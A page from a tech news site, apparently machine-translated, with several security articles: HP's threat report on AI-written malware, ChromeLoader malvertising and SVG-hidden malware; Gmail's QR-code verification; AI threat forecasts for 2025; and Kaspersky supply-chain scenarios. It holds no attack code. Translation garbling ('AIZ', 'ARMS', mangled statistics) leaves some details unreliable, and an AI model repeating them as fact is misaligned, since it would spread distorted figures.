
Attackers Malware Urea
HP Wolf Security’sten reports point to the use of artificial intelligence when creating malware scripts, threat actors relying on malvertising to spread fake PDF tools, and malware embedded in image files.
HP Wolf Security’sten reports point to the use of artificial intelligence when creating malware scripts, threat actors relying on malvertising to spread fake PDF tools, and malware embedded in image files.
The latest in HP Imagine reveals how attackers are using generative AI to help write malicious code. Threat Insights Report published. HP’s threat research team has detected a large, refined ChromeLoader attack spread via malvertisements that lead to professional-looking fake PDF tools and identified cybercriminals who injected malicious code into SVG images.
The report provides an analysis of real-world cyberattacks, helping organizations stay abreast of the latest techniques cybercriminals are using to evade detection and breach computers in the rapidly changing cybercrime landscape. Based on data from millions of endpoints running HP Wolf Security, key attacks identified by HP threat researchers include:
- Generative AI helps develop malware in all environments: Cybercriminals are already using AI to create convincing phishing traps, but to date there has been limited evidence of threat actors using AI tools to write code. The team detected a campaign targeting French speakers using VBScript and JavaScript, believed to have been written with the help of AIZ. The structure of the scripts, comments explaining each line of code, and native language function names and selection of variables are strong indicators that the threat actor is using ARMS to create the malware. The attack infects users with the freely available AsyncRAT malware, an easy-to-obtain information stealer that can record the victim’s screens and keystrokes. This activity demonstrates how AIM lowers the bar for cybercriminals to infect endpoints.
- Subtly crafted malicious advertising campaigns that lead to fake but functional PDF tools: ChromeLoader attacks are getting bigger and more convincing, relying on popular search keywords and malicious ads to direct victims to well-designed websites that offer functional tools like PDF readers and converters. These applications hide malicious code in an MSI file, while valid code signing certificates bypass Windows security policies and user warnings, increasing the likelihood of infection. Installing these fake applications allows attackers to hijack victims’ browsers and redirect searches to attacker-controlled sites.
- “This logo cannot be used” hides malware in Scalable Vector Graphics (SVG) images: Some cybercriminals are bucking the trend by switching from HTML files to vector images to disguise malware. Vector images commonly used in graphic design generally use the XML-based SVG format. Because SVGs open automatically in browsers, embedded JavaScript codes are executed when the image is viewed. While victims think they are viewing an image, they are interacting with a complex file format that leads to the installation of multiple types of stealing malware.
By isolating threats that evade detection tools on computers—but by allowing malware to safely engage first—HP Wolf Security can capture specific insights into the latest techniques used by cybercriminals. To date, HP Wolf Security customers have clicked on more than 40 billion email attachments, web pages, and downloaded files without any reported breaches.
Examining data from Q2 2024, the report details how cybercriminals continue to diversify their attack methods to bypass security policies and detection tools:
– HP Sure Click At least 12% of email threats detected by Microsoft bypassed one or more email gateway scanners, the same rate as in the previous quarter.
– The top threat vectors were email attachments (61%), downloads from browsers (18%), and other infection vectors such as removable storage such as USB flash drives and file shares (21%).
– Archives were the most popular malware distribution type (39%), of which 26% were ZIP files.
HP Wolf Security runs risky tasks in isolated, hardware-hardened virtual machines running at the edge to protect users without impacting their productivity. It also captures detailed traces of infection attempts. HP’s application isolation technology reduces threats that can evade other security tools and provides unique insight into intrusion techniques and behavior of threat actors.
Security
Google goes to authentication with QR coded for Gmail with two -factor identity
Google is preparing to make a significant change to increase Gmail’s security.

Google is preparing to make a significant change to increase Gmail’s security.
For a long time with two -factor authentication (2FA) using SMS codes for Gmail, in the near future will switch to QR codes. This change is made due to security risks of SMS verification and aims to protect users better than cyber attacks.
According to Forbes, the new verification method, which will be available in the next few months, stands out as a measure of Google against fraudsters who abuse SMS -based authentication. Google official Ross Richendrfer said that the company has been going to this method in order to reduce global increased SMS fraud and identity hunting attacks on a global scale. Google does not completely remove SMS verification, but instead of buying a six -digit code, users will offer a QR code that users have to scan when entering Gmail.
Why is Google to verify QR coded?
There are some security deficits of traditional SMS verification:
–Open to ID Hunt attacks: Codes coming by SMS can be captured by scammers. QR codes reduce this risk because they do not contain a shared code.
–SIM card fraud: Malicious people, using the phone numbers of users their He can steal authentication codes.
– SMS traffic fraud: Cyber criminals can deceive service providers and send a large number of SMS to the numbers they control and gain from it.
Google, QR code -based verification will largely close these security gaps, he says. With the new system, the Gmail user will see a QR code on the screen when logging in, and will complete the authentication by scanning this code with a Google application or a device that supports verification.
Google has recently added a few more important updates in the application. One of them is that Android and iOS users can pay invoices directly through Gmail. The company plans to continue to increase Gmail’s security and functionality in the future. The authentication with QR coded two -factor authentication, which will be available for everyone soon, will make it safer and easier to log in to Gmail.
Artificial Intelligence
Is Artificial Intelligence a Security Shield or a Threat Tool?
Artificial intelligence has given a major boost to the cybersecurity arms race in the past year. There will be no break from this race for the next 12 months. This has significant implications for corporate cybersecurity teams and employers, as well as everyday web users.

Artificial intelligence has given a major boost to the cybersecurity arms race in the past year. There will be no break from this race for the next 12 months. This has significant implications for corporate cybersecurity teams and employers, as well as everyday web users.
Safe experts They underlined what should be taken into consideration in 2025, stating that artificial intelligence tools can increase the scale and severity of all kinds of fraud, disinformation campaigns and other threats in the hands of bad actors.
The UK’s National Cyber Security Center (NCSC) warned at the start of 2024 that AI is already being used by all types of threat actors and will “increase the volume and impact of cyber attacks over the next two years”. The threat is most visible in the field of social engineering, where generative artificial intelligence (GenAI) can help malicious actors craft persuasive campaigns in error-free local languages.
Although these trends will continue in 2025, we can also see artificial intelligence used for the following purposes:
· Authentication bypass: Deepfake technology used to help scammers impersonate customers in selfie and video-based checks for new account creation and account access.
· Business email compromise (BEC): AI was once again used for social engineering, but this time to trick the corporate buyer into transferring money to an account under the fraudster’s control. Deepfake audio and video can also be used to impersonate CEOs and other senior leaders in phone calls and virtual meetings.
· Imitation scam: Open source large language models (LLMs) will present new opportunities for fraudsters. By training these models on data collected from hacked or public social media accounts, fraudsters can impersonate victims in virtual kidnappings and other scams designed to fool their friends and family.
· Influencer scam: Similarly, we expect to see GenAI used by scammers in 2025 to create fake or duplicate social media accounts impersonating celebrities, influencers, and other public figures. Deepfake videos will be released to trick followers into handing over their personal information and money, for example in investment and crypto scams, including the kind of tricks highlighted in ESET’s latest Threat Report. This will put more pressure on social media platforms to offer effective account verification tools and badges and keep you on your toes.
· Disinformation: Hostile states and other groups will leverage GenAI to easily generate fake content to trick gullible social media users into following fake accounts. These users can then be turned into online amplifiers for influence operations that are more effective and harder to detect than content/troll farms.
· Password cracking: AI-driven tools can mass expose user credentials in seconds to gain access to corporate networks and data, as well as customer accounts.
AI privacy concerns for 2025
Artificial intelligence will not just be a tool for threat actors next year. It will also bring a high risk of data leakage. LLMs need large volumes of text, images and video to educate themselves. Often some of this data will be sensitive:
Such as biometrics, health information or financial data. In some cases, social media and other companies may change the Terms and Conditions to use customer data to train models. Once this information is collected by the AI model, it poses a risk to individuals if the AI system itself is hacked or if the information is shared with others through GenAI applications running on LLM.
There is also a concern for enterprise users that they may unknowingly share sensitive business information through GenAI prompts. A fifth of UK companies have inadvertently exposed potentially sensitive corporate data through employee use of GenAI, a survey has found.
AI for defenders in 2025
The good news is that AI will play a larger role in the work of cybersecurity teams in the coming year as it is incorporated into new products and services.
· Users, security teams and even A.I. creating synthetic data to train security tools
- Summarizing long and complex threat intelligence reports for analysts
- Improving SecOps efficiency for overloaded teams by contextualizing and prioritizing alerts and automating workflows for investigation and remediation
- Scanning large data volumes for signs of suspicious behavior
- Skilling IT teams through “co-pilot” functionality built into a variety of products to help reduce the possibility of misconfiguration
However, IT and security leaders A.I. It must also understand its limitations and the importance of human expertise in decision-making. A balance between human and machine will be needed in 2025 to reduce the risk of delusions, pattern distortion, and other potential negative outcomes. A.I. It is not a magic wand. It should be combined with other tools and techniques for optimum results.
AI challenges in compliance and implementation
The evolution of the threat landscape and AI security does not occur in a vacuum. Geopolitical changes in 2025, especially in the United States, could even lead to deregulation in the technology and social media sectors.
This could enable scammers and other malicious actors to flood online platforms with AI-generated threats. Meanwhile, in the EU, there is still some uncertainty around AI regulation, which could make life more difficult for compliance teams. As legal experts note, codes of practice and guidance still need to be sorted out and liability calculated for AI system failures. Lobbying from the tech sector could change how EU AI law is implemented in practice.
What is clear, however, is that artificial intelligence will fundamentally change the way we interact with technology in 2025, for better and for worse. While it offers great potential benefits for businesses and individuals, it also poses new risks that need to be managed. It would be in everyone’s interest to work more closely over the next year to make sure this happens. Governments, private sector businesses and end users must do their part and work together to harness the potential of AI while mitigating its risks.
Security
Kaspersky, IT Outage And Supply Chain Risk Scenario
As part of Kaspersky’s annual “Security Bulletin”, the company’s experts analyzed major supply chain attacks and IT outages experienced last year.

As part of Kaspersky’s annual “Security Bulletin”, the company’s experts analyzed major supply chain attacks and IT outages experienced last year.
In 2024, supply chain attacks and IT outages emerge as prominent cybersecurity concerns, demonstrating that almost no infrastructure is completely immune from risk. A faulty CrowdStrike update affected millions of systems; Sophisticated incidents such as the XZ backdoor and the Polyfill.io supply chain attack have highlighted the risks inherent in widely used tools. These and other notable cases highlight the need for rigorous security measures, robust patch and update management, and proactive defenses to protect global supply chains and infrastructure.
While evaluating the events of 2024 within the scope of “Story of the Year”, Kaspersky Security Bulletin discusses possible future scenarios and the potential consequences of these scenarios as follows:
But what if a major AI provider experiences an outage or data breach? Businesses are increasingly relying on models from providers such as OpenAI, Meta, Anthropic. However, despite the excellent user experience these integrations offer, they also come with significant cyber risks. Dependence on a single AI provider or a limited number of service providers creates concentrated points of failure. If a large artificial intelligence company experiences a critical outage, it can significantly affect tens or even thousands of services that depend on them.
Additionally, an incident at a major AI provider could lead to one of the most serious data leaks since these systems store large amounts of sensitive information.
But what if on-device AI tools are exploited? As AI becomes more integrated into everyday devices, the risk of it becoming an attack vector increases significantly. For example, Kaspersky’s Operation Triangulation campaign, revealed last year, showed how attackers can compromise device integrity by exploiting system software and hardware using zero-day vulnerabilities and installing advanced spyware. Potential software or hardware vulnerabilities in the neural processing units that run AI, including certain platforms such as Apple Intelligence, could, if discovered, significantly increase the scope and impact of such attacks. Exploiting such vulnerabilities can significantly amplify the scale and impact of attacks using AI capabilities.
Kaspersky’s Operation Triangulation investigation also uncovered a first-of-its-kind case reported by the company: the misuse of on-device machine learning tools for data extraction. This suggests that features designed to improve user experience are already being weaponized by advanced threat actors.
But what if threat actors disrupt satellite connectivity? Although the space industry has been facing various cyber attacks for some time, the new target of threat actors may be satellite internet providers as an important element of the global connectivity chain. Satellite internet can provide temporary communication links when other systems are down; Airlines, cruise lines and other platforms can rely on this service to offer connectivity to passengers. It can also be used to enable secure communication services.
This creates cyber risks: a targeted cyber attack or a faulty update against a leading or dominant satellite provider can cause internet outages and possible communication breakdowns and seriously impact individuals and organizations.
But what if major physical threats to the internet materialize? Continuing on the topic of connectivity, the internet is also vulnerable to physical threats. 95% of global data via undersea cables while being transmittedwhich are physical locations where different networks exchange data traffic approximately There are 1,500 Internet Exchange Points (IXPs). Many of these points are located in data centers.
An outage to just a few critical components of this chain – such as trunk cables or IXPs – could overload the remaining infrastructure and potentially lead to widespread outages, significantly impacting global connectivity.
But what if serious vulnerabilities are exploited in the Windows and Linux kernels? These operating systems run many critical assets around the world – servers, production equipment, logistics systems, IoT devices, and others. A remotely exploitable core vulnerability in these systems could expose countless devices and networks around the world to potential attacks, creating a high-risk situation where global supply chains could suffer major disruptions.
“Supply chain risks may seem daunting, but awareness is the first step to prevention,” said Igor Kuznetsov, Director of Kaspersky Global Research and Analysis Team (GReAT). We can reduce single points of failure by rigorously testing updates, using AI-powered anomaly detection, and diversifying providers. We can eliminate weak elements and build resilience. It is also vital to create a culture of responsibility among staff, because human attention is the cornerstone of security. “Together, these measures can ensure a safer future by protecting supply chains.”
-
Mobile2 weeks ago
The countdown has begun for POCO F7 Promotion Date
-
Mobile2 weeks ago
Budget Friendly Game Monster from Honor: GT Pro Details have been announced
-
Mobile2 weeks ago
Redmi K90’s screen leaked: smaller but stronger
-
Wearable Technology1 week ago
Sleep apnea with Galaxy Watch is now available in 70 countries
-
Wearable Technology2 weeks ago
Amazfit Active 2 Square’s Premium Model appeared
-
Hardware news and contents2 weeks ago
Redmi Pad 2 was introduced: Changes the balance in the affordable tablet class
-
Gaming1 week ago
New Game of Thrones Game Announced!
-
Artificial Intelligence7 days ago
OpenAI’s open artificial intelligence model is retired